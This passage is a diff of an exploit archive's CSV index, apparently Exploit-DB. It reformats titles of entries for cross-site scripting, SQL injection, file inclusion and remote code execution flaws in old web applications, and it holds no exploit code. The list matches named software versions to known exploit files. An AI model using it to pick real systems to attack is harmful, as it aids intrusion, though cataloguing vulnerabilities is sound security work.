'upload.php Filename' Parameter Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 +32162,platforms/multiple/webapps/32162.txt,"ownCloud 4.0.x/4.5.x - 'upload.php?Filename' Remote Code Execution",2014-03-10,Portcullis,multiple,webapps,80 32168,platforms/php/webapps/32168.txt,"Pluck CMS 4.5.2 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,"Khashayar Fereidani",php,webapps,0 32169,platforms/php/webapps/32169.txt,"Crafty Syntax Live Help 2.14.6 - 'livehelp_js.php' Cross-Site Scripting",2008-08-05,CoRSaNTuRK,php,webapps,0 -32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery - images.php Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32172,platforms/php/webapps/32172.txt,"Softbiz Image Gallery - suggest_image.php Multiple Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32173,platforms/php/webapps/32173.txt,"Softbiz Image Gallery - image_desc.php latest Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32174,platforms/php/webapps/32174.txt,"Softbiz Image Gallery - adminhome.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32175,platforms/php/webapps/32175.txt,"Softbiz Image Gallery - config.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32176,platforms/php/webapps/32176.txt,"Softbiz Image Gallery - changepassword.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32177,platforms/php/webapps/32177.txt,"Softbiz Image Gallery - cleanup.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 -32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery - browsecats.php msg Parameter Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 +32170,platforms/php/webapps/32170.txt,"Softbiz Image Gallery - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,php,webapps,0 +32171,platforms/php/webapps/32171.txt,"Softbiz Image Gallery - 'images.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,php,webapps,0 +32172,platforms/php/webapps/32172.txt,"Softbiz Image Gallery - 'suggest_image.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-05,sl4xUz,php,webapps,0 +32173,platforms/php/webapps/32173.txt,"Softbiz Image Gallery - 'image_desc.php?latest' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 +32174,platforms/php/webapps/32174.txt,"Softbiz Image Gallery - 'adminhome.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 +32175,platforms/php/webapps/32175.txt,"Softbiz Image Gallery - 'config.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 +32176,platforms/php/webapps/32176.txt,"Softbiz Image Gallery - 'changepassword.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 +32177,platforms/php/webapps/32177.txt,"Softbiz Image Gallery - 'cleanup.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 +32178,platforms/php/webapps/32178.txt,"Softbiz Image Gallery - 'browsecats.php?msg' Cross-Site Scripting",2008-08-05,sl4xUz,php,webapps,0 32179,platforms/php/webapps/32179.txt,"POWERGAP ShopSystem - 's03.php' SQL Injection",2008-08-05,"Rohit Bansal",php,webapps,0 -32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusion",2008-08-06,casper41,php,webapps,0 +32180,platforms/php/webapps/32180.txt,"Chupix CMS Contact Module 0.1 - 'index.php' Multiple Local File Inclusions",2008-08-06,casper41,php,webapps,0 32181,platforms/php/webapps/32181.txt,"Battle.net Clan Script 1.5.x - 'index.php' Multiple SQL Injections",2008-08-06,"Khashayar Fereidani",php,webapps,0 -32182,platforms/php/webapps/32182.txt,"PHPKF-Portal 1.10 - baslik.php tema_dizin Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 -32183,platforms/php/webapps/32183.txt,"PHPKF-Portal 1.10 - anket_yonetim.php portal_ayarlarportal_dili Parameter Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 -32184,platforms/asp/webapps/32184.txt,"KAPhotoservice - order.asp page Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 -32185,platforms/asp/webapps/32185.txt,"KAPhotoservice - search.asp Filename Parameter Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 +32182,platforms/php/webapps/32182.txt,"PHPKF-Portal 1.10 - 'baslik.php?tema_dizin' Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 +32183,platforms/php/webapps/32183.txt,"PHPKF-Portal 1.10 - 'anket_yonetim.php?portal_ayarlarportal_dili' Traversal Local File Inclusion",2008-08-06,KnocKout,php,webapps,0 +32184,platforms/asp/webapps/32184.txt,"KAPhotoservice - 'order.asp?page' Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 +32185,platforms/asp/webapps/32185.txt,"KAPhotoservice - 'search.asp?Filename' Cross-Site Scripting",2008-08-06,by_casper41,asp,webapps,0 32186,platforms/php/webapps/32186.txt,"Quate CMS 0.3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-08-06,CraCkEr,php,webapps,0 -32187,platforms/php/webapps/32187.txt,"Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusion",2008-08-06,by_casper41,php,webapps,0 -32188,platforms/php/webapps/32188.txt,"Multiple WebmasterSite Products - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 +32187,platforms/php/webapps/32187.txt,"Joomla! / Mambo Component com_utchat 0.2 - Multiple Remote File Inclusions",2008-08-06,by_casper41,php,webapps,0 +32188,platforms/php/webapps/32188.txt,"WebmasterSite (Multiple Products) - Remote Command Execution",2008-08-06,otmorozok428,php,webapps,0 32190,platforms/php/webapps/32190.txt,"Kshop 2.22 - 'kshop_search.php' Cross-Site Scripting",2008-08-06,Lostmon,php,webapps,0 -32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' Parameter SQL Injection",2008-08-06,Lovebug,php,webapps,0 +32191,platforms/php/webapps/32191.txt,"PHP-Nuke Kleinanzeigen Module - 'lid' SQL Injection",2008-08-06,Lovebug,php,webapps,0 32196,platforms/php/webapps/32196.txt,"RMSOFT MiniShop 1.0 - 'search.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-09,Lostmon,php,webapps,0 -32198,platforms/php/webapps/32198.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - friends.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32199,platforms/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - seutubo.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32200,platforms/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - album.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - scrapbook.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32198,platforms/php/webapps/32198.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'friends.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32199,platforms/php/webapps/32199.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'seutubo.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32200,platforms/php/webapps/32200.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'album.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32201,platforms/php/webapps/32201.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'scrapbook.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32202,platforms/php/webapps/32202.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'index.php' uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 -32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - tribes.php uid Parameter Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 +32203,platforms/php/webapps/32203.txt,"Yogurt Social Network 3.2 rc1 Module for XOOPS - 'tribes.php?uid' Cross-Site Scripting",2008-08-09,Lostmon,php,webapps,0 32204,platforms/hardware/webapps/32204.txt,"ZYXEL P-660HN-T1A Router - Login Bypass",2014-03-12,"Michael Grifalconi",hardware,webapps,0 32282,platforms/php/webapps/32282.txt,"Church Edit - Blind SQL Injection",2014-03-15,ThatIcyChill,php,webapps,0 32207,platforms/php/webapps/32207.txt,"GNUPanel 0.3.5_R4 - Multiple Vulnerabilities",2014-03-12,"Necmettin COSKUN",php,webapps,80 32211,platforms/php/webapps/32211.txt,"LuxCal 3.2.2 - Cross-Site Request Forgery / Blind SQL Injection",2014-03-12,"TUNISIAN CYBER",php,webapps,80 32212,platforms/asp/webapps/32212.txt,"Procentia IntelliPen 1.1.12.1520 - data.aspx Blind SQL Injection",2014-03-12,Portcullis,asp,webapps,80 32213,platforms/php/webapps/32213.txt,"vTiger CRM 5.4.0/6.0 RC/6.0.0 GA - 'browse.php' Local File Inclusion",2014-03-12,Portcullis,php,webapps,80 -32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusion",2008-08-08,"Rohit Bansal",php,webapps,0 +32217,platforms/php/webapps/32217.txt,"Linkspider 1.08 - Multiple Remote File Inclusions",2008-08-08,"Rohit Bansal",php,webapps,0 32218,platforms/php/webapps/32218.txt,"Domain Group Network GooCMS 1.02 - 'index.php' Cross-Site Scripting",2008-08-11,ahmadbaby,php,webapps,0 -32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - visitor/index.php sessionid Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 +32219,platforms/php/webapps/32219.txt,"Kayako SupportSuite 3.x - 'visitor/index.php?sessionid' Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 32220,platforms/php/webapps/32220.txt,"Kayako SupportSuite 3.x - 'index.php' filter Parameter Cross-Site Scripting",2008-08-11,"James Bercegay",php,webapps,0 -32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - staff/index.php customfieldlinkid Parameter SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 +32221,platforms/php/webapps/32221.txt,"Kayako SupportSuite 3.x - 'staff/index.php?customfieldlinkid' SQL Injection",2008-08-11,"James Bercegay",php,webapps,0 32226,platforms/php/webapps/32226.txt,"Datafeed Studio - 'patch.php' Remote File Inclusion",2008-08-12,"Bug Researchers Group",php,webapps,0 32227,platforms/php/webapps/32227.txt,"Datafeed Studio 1.6.2 - 'search.php' Cross-Site Scripting",2008-08-12,"Bug Researchers Group",php,webapps,0 32230,platforms/php/webapps/32230.txt,"IDevSpot PHPLinkExchange 1.01/1.02 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-08-12,sl4xUz,php,webapps,0 -32231,platforms/php/webapps/32231.txt,"Meet#Web 0.8 - modules.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32232,platforms/php/webapps/32232.txt,"Meet#Web 0.8 - ManagerResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32233,platforms/php/webapps/32233.txt,"Meet#Web 0.8 - ManagerRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32234,platforms/php/webapps/32234.txt,"Meet#Web 0.8 - RegForm.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32235,platforms/php/webapps/32235.txt,"Meet#Web 0.8 - RegResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 - RegRightsResource.class.php root_path Parameter Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 -32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 +32231,platforms/php/webapps/32231.txt,"Meet#Web 0.8 - 'modules.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32232,platforms/php/webapps/32232.txt,"Meet#Web 0.8 - 'ManagerResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32233,platforms/php/webapps/32233.txt,"Meet#Web 0.8 - 'ManagerRightsResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32234,platforms/php/webapps/32234.txt,"Meet#Web 0.8 - 'RegForm.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32235,platforms/php/webapps/32235.txt,"Meet#Web 0.8 - 'RegResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32236,platforms/php/webapps/32236.txt,"Meet#Web 0.8 - 'RegRightsResource.class.php?root_path' Remote File Inclusion",2008-08-13,"Rakesh S",php,webapps,0 +32237,platforms/hardware/webapps/32237.txt,"Ubee EVW3200 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32238,platforms/hardware/webapps/32238.txt,"Ubee EVW3200 - Cross-Site Request Forgery",2014-03-13,"Jeroen - IT Nerdbox",hardware,webapps,0 32239,platforms/php/webapps/32239.txt,"Fonality trixbox - SQL Injection",2014-03-13,Sc4nX,php,webapps,0 32249,platforms/jsp/webapps/32249.txt,"Openfire 3.5.2 - 'login.jsp' Cross-Site Scripting",2008-08-14,"Daniel Henninger",jsp,webapps,0 32250,platforms/php/webapps/32250.py,"mUnky 0.01 - 'index.php' Remote Code Execution",2008-08-15,"Khashayar Fereidani",php,webapps,0 -32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Parameter Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 -32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - administrator/popups/index3pop.php mosConfig_sitename Parameter Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 +32251,platforms/php/webapps/32251.txt,"PHPizabi 0.848b C1 HP3 - 'id' Local File Inclusion",2008-08-15,Lostmon,php,webapps,0 +32252,platforms/php/webapps/32252.txt,"Mambo Open Source 4.6.2 - 'administrator/popups/index3pop.php?mosConfig_sitename' Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32253,platforms/php/webapps/32253.txt,"Mambo Open Source 4.6.2 - 'mambots/editors/mostlyce/' PHP/connector.php Query String Cross-Site Scripting",2008-08-15,"Khashayar Fereidani",php,webapps,0 32254,platforms/php/webapps/32254.txt,"FlexCMS 2.5 - 'inc-core-admin-editor-previouscolorsjs.php' Cross-Site Scripting",2008-08-15,Dr.Crash,php,webapps,0 32255,platforms/asp/webapps/32255.txt,"FipsCMS 2.1 - 'neu.asp' SQL Injection",2008-08-15,U238,asp,webapps,0 32257,platforms/php/webapps/32257.txt,"PromoProducts - 'view_product.php' Multiple SQL Injections",2008-08-15,baltazar,php,webapps,0 32258,platforms/cgi/webapps/32258.txt,"AWStats 6.8 - 'AWStats.pl' Cross-Site Scripting",2008-08-18,"Morgan Todd",cgi,webapps,0 -32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - english/account.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32259,platforms/php/webapps/32259.txt,"Freeway 1.4.1.171 - 'english/account.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 33409,platforms/php/webapps/33409.txt,"Article Directory - 'login.php' SQL Injection",2009-12-16,"R3d D3v!L",php,webapps,0 -32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Parameter Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 -32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Parameter Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 +32285,platforms/php/webapps/32285.txt,"vBulletin 3.6.10/3.7.2 - '$newpm[title]' Cross-Site Scripting",2008-08-20,"Core Security",php,webapps,0 +32263,platforms/php/webapps/32263.txt,"Fonality trixbox - 'mac' Remote Code Injection",2014-03-14,i-Hmx,php,webapps,80 32264,platforms/php/webapps/32264.txt,"Freeway 1.4.1.171 - 'french/account_newsletters.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - includes/modules/faqdesk/faqdesk_article_require.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32265,platforms/php/webapps/32265.txt,"Freeway 1.4.1.171 - 'includes/modules/faqdesk/faqdesk_article_require.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32266,platforms/php/webapps/32266.txt,"Freeway 1.4.1.171 - 'includes/modules/newsdesk/newsdesk_article_require.php' language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 - templates/Freeway/boxes/card1.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 - templates/Freeway/boxes/loginbox.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 - templates/Freeway/boxes/whos_online.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 -32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 - templates/Freeway/mainpage_modules/mainpage.php language Parameter Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32267,platforms/php/webapps/32267.txt,"Freeway 1.4.1.171 - 'templates/Freeway/boxes/card1.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32268,platforms/php/webapps/32268.txt,"Freeway 1.4.1.171 - 'templates/Freeway/boxes/loginbox.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32269,platforms/php/webapps/32269.txt,"Freeway 1.4.1.171 - 'templates/Freeway/boxes/whos_online.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 +32270,platforms/php/webapps/32270.txt,"Freeway 1.4.1.171 - 'templates/Freeway/mainpage_modules/mainpage.php?language' Traversal Local File Inclusion",2008-08-18,"Digital Security Research Group",php,webapps,0 32271,platforms/php/webapps/32271.txt,"NewsHOWLER 1.03 - Cookie Data SQL Injection",2008-08-18,"Khashayar Fereidani",php,webapps,0 32272,platforms/php/webapps/32272.txt,"Ovidentia 6.6.5 - 'index.php' Cross-Site Scripting",2008-08-18,"ThE dE@Th",php,webapps,0 32368,platforms/jsp/webapps/32368.txt,"McAfee Asset Manager 6.6 - Multiple Vulnerabilities",2014-03-19,"Brandon Perry",jsp,webapps,80 @@ -33059,7 +33060,7 @@ id,file,description,date,author,platform,type,port 32275,platforms/php/webapps/32275.txt,"itMedia - Multiple SQL Injections",2008-08-18,baltazar,php,webapps,0 32278,platforms/asp/webapps/32278.txt,"K Web CMS - 'sayfala.asp' SQL Injection",2008-08-18,baltazar,asp,webapps,0 32279,platforms/php/webapps/32279.txt,"Vanilla 1.1.4 - HTML Injection / Cross-Site Scripting",2008-08-19,"James Bercegay",php,webapps,0 -32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' Parameter SQL Injection",2008-08-20,"Hussin X",php,webapps,0 +32280,platforms/php/webapps/32280.txt,"YourFreeWorld Ad-Exchange Script - 'id' SQL Injection",2008-08-20,"Hussin X",php,webapps,0 32281,platforms/php/webapps/32281.cs,"Folder Lock 5.9.5 - Weak Password Encryption Local Information Disclosure",2008-06-19,"Charalambous Glafkos",php,webapps,0 32287,platforms/php/webapps/32287.txt,"FAR-PHP 1.0 - 'index.php' Local File Inclusion",2008-08-21,"Beenu Arora",php,webapps,0 32288,platforms/php/webapps/32288.txt,"TimeTrex Time 2.2 and Attendance Module - Multiple Cross-Site Scripting Vulnerabilities",2008-08-21,Doz,php,webapps,0 @@ -33077,38 +33078,38 @@ id,file,description,date,author,platform,type,port 32307,platforms/php/webapps/32307.txt,"vTiger CRM 5.0.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-01,"Fabian Fingerle",php,webapps,0 32308,platforms/php/webapps/32308.txt,"GenPortal - 'buscarCat.php' Cross-Site Scripting",2008-09-01,sl4xUz,php,webapps,0 32309,platforms/php/webapps/32309.txt,"Full PHP Emlak Script - 'landsee.php' SQL Injection",2008-08-29,"Hussin X",php,webapps,0 -32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Parameter Cross-Site Scripting",2008-09-02,Am!r,php,webapps,0 -32313,platforms/php/webapps/32313.txt,"OpenDB 1.0.6 - user_admin.php user_id Parameter Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 -32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 - listings.php title Parameter Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 -32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 - user_profile.php redirect_url Parameter Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 -32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' Parameter SQL Injection",2008-09-03,e.wiZz!,php,webapps,0 -32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting",2008-09-03,C1c4Tr1Z,php,webapps,0 +32312,platforms/php/webapps/32312.txt,"IDevSpot BizDirectory 2.04 - 'page' Cross-Site Scripting",2008-09-02,Am!r,php,webapps,0 +32313,platforms/php/webapps/32313.txt,"OpenDB 1.0.6 - 'user_admin.php?user_id' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 +32314,platforms/php/webapps/32314.txt,"OpenDB 1.0.6 - 'listings.php?title' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 +32315,platforms/php/webapps/32315.txt,"OpenDB 1.0.6 - 'user_profile.php?redirect_url' Cross-Site Scripting",2008-08-28,C1c4Tr1Z,php,webapps,0 +32316,platforms/php/webapps/32316.txt,"eliteCMS 1.0 - 'page' SQL Injection",2008-09-03,e.wiZz!,php,webapps,0 +32317,platforms/php/webapps/32317.txt,"@Mail 5.42 and @Mail WebMail 5.0.5 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-03,C1c4Tr1Z,php,webapps,0 32318,platforms/php/webapps/32318.txt,"XRms 1.99.2 - 'login.php' target Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32319,platforms/php/webapps/32319.txt,"OpenSupports 2.x - Authentication Bypass / Cross-Site Request Forgery",2014-03-17,"TN CYB3R",php,webapps,0 -32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 -32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Parameter Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32320,platforms/php/webapps/32320.txt,"XRms 1.99.2 - 'title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32321,platforms/php/webapps/32321.txt,"XRms 1.99.2 - 'company_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32322,platforms/php/webapps/32322.txt,"XRms 1.99.2 - 'last_name' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32323,platforms/php/webapps/32323.txt,"XRms 1.99.2 - 'campaign_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32324,platforms/php/webapps/32324.txt,"XRms 1.99.2 - 'opportunity_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32325,platforms/php/webapps/32325.txt,"XRms 1.99.2 - 'case_title' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32326,platforms/php/webapps/32326.txt,"XRms 1.99.2 - 'file_id' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 +32327,platforms/php/webapps/32327.txt,"XRms 1.99.2 - 'starting' Cross-Site Scripting",2008-09-04,"Fabian Fingerle",php,webapps,0 32330,platforms/php/webapps/32330.txt,"OpenSupports 2.0 - Blind SQL Injection",2014-03-17,indoushka,php,webapps,0 32331,platforms/php/webapps/32331.txt,"Joomla! Component AJAX Shoutbox 1.6 - SQL Injection",2014-03-17,"Ibrahim Raafat",php,webapps,0 32334,platforms/php/webapps/32334.txt,"CeleronDude Uploader 6.1 - 'account.php' Cross-Site Scripting",2008-09-03,Xc0re,php,webapps,0 32337,platforms/php/webapps/32337.txt,"Silentum LoginSys 1.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-06,"Maximiliano Soler",php,webapps,0 -32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS - 'results_per_page' Parameter Cross-Site Scripting",2008-09-07,"David Sopas",php,webapps,0 +32338,platforms/php/webapps/32338.txt,"phpAdultSite CMS - 'results_per_page' Cross-Site Scripting",2008-09-07,"David Sopas",php,webapps,0 32340,platforms/php/webapps/32340.txt,"Gallery 2.0 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-08,sl4xUz,php,webapps,0 32342,platforms/php/webapps/32342.txt,"eXtrovert software Thyme 1.3 - 'pick_users.php' SQL Injection",2008-09-08,"Omer Singer",php,webapps,0 32346,platforms/php/webapps/32346.txt,"E-PHP B2B Trading Marketplace Script - 'listings.php' SQL Injection",2008-09-07,r45c4l,php,webapps,0 32347,platforms/php/webapps/32347.txt,"UBBCentral UBB.Threads 7.3.1 - 'Forum[]' Array SQL Injection",2008-09-02,"James Bercegay",php,webapps,0 -32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusion",2008-09-10,SirGod,php,webapps,0 +32351,platforms/php/webapps/32351.txt,"Jaw Portal 1.2 - 'index.php' Multiple Local File Inclusions",2008-09-10,SirGod,php,webapps,0 32352,platforms/php/webapps/32352.txt,"AvailScript Job Portal Script - 'applynow.php' SQL Injection",2008-09-10,InjEctOr5,php,webapps,0 32353,platforms/php/webapps/32353.txt,"Horde Application Framework 3.2.1 - Forward Slash Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32354,platforms/php/webapps/32354.txt,"Horde 3.2 - MIME Attachment Filename Insufficient Filtering Cross-Site Scripting",2008-09-10,"Alexios Fakos",php,webapps,0 32355,platforms/php/webapps/32355.txt,"Hot Links SQL-PHP - 'news.php' SQL Injection",2008-09-10,r45c4l,php,webapps,0 -32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - smileys.php page_id Parameter Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps,0 -32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - search.php q Parameter Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps,0 +32360,platforms/php/webapps/32360.txt,"Nooms 1.1 - 'smileys.php?page_id' Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps,0 +32361,platforms/php/webapps/32361.txt,"Nooms 1.1 - 'search.php?q' Cross-Site Scripting",2008-09-11,Dr.Crash,php,webapps,0 32364,platforms/php/webapps/32364.txt,"Dynamic MP3 Lister 2.0.1 - 'index.php' Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32365,platforms/php/webapps/32365.txt,"Paranews 3.4 - Multiple Cross-Site Scripting Vulnerabilities",2008-09-12,Xylitol,php,webapps,0 32366,platforms/php/webapps/32366.txt,"QuicO - 'photo.php' SQL Injection",2008-09-12,"Beenu Arora",php,webapps,0 @@ -33121,9 +33122,9 @@ id,file,description,date,author,platform,type,port 32419,platforms/php/webapps/32419.pl,"Libra File Manager 1.18/2.0 - 'fileadmin.php' Local File Inclusion",2008-09-25,Pepelux,php,webapps,0 32421,platforms/php/webapps/32421.html,"Flatpress 0.804 - Multiple Cross-Site 